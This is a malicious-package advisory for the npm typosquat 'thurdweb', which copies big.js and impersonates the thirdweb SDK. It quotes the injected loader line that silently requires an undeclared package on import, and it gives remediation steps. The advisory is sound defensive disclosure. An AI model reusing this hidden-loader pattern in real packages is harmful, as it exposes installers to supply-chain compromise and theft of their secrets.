MAL-2026-6345
Dashboard / Malicious Package / MAL-2026-6345
MAL-2026-6345
Summary: Malicious code in thurdweb (npm)
Details: Source: amazon-inspector (775ff15f4a1314978d4cfed1e97c6c9ac8621d8ddeed93160c25aa3681f73cc7) Package name `thurdweb` is a one-character substitution of the popular web3 SDK `thirdweb`, but the shipped source is a copy of MikeMcl/big.js (arbitrary-precision decimal arithmetic) — the public API has no relation to the impersonated target. The library file (`big.js` / `big.mjs` lines 605-608) contains an injected top-level block that fires on `require('thurdweb')` / `import 'thurdweb'`: `try { const doc = require("parket-slot"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. `parket-slot` is not declared in `package.json` `dependencies`, and the entire call is wrapped in an empty try/catch that silently swallows every error. `package.json` additionally declares `log-taker@^0.0.9` as a runtime dependency, which is unrelated to decimal arithmetic and shares the same nondescriptive shape. Any installer who imports this package transitively loads attacker-controlled code from sibling packages whose contents the publisher controls and can mutate independently of this tarball; the silent error handler hides failure from the consumer. Source: ghsa-malware (5c30d6f92980cd152eeb4c1f706539d5b57988f02c761cd413392a73cba70fd1) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
References: https://www.npmjs.com/package/thurdweb/v/0.0.8, https://github.com/advisories/GHSA-vx4c-33rj-4xv8
Affected packages
Package
Name: thurdweb
Purl: pkg:npm/thurdweb
Affected ranges
Type: SEMVER
Events:
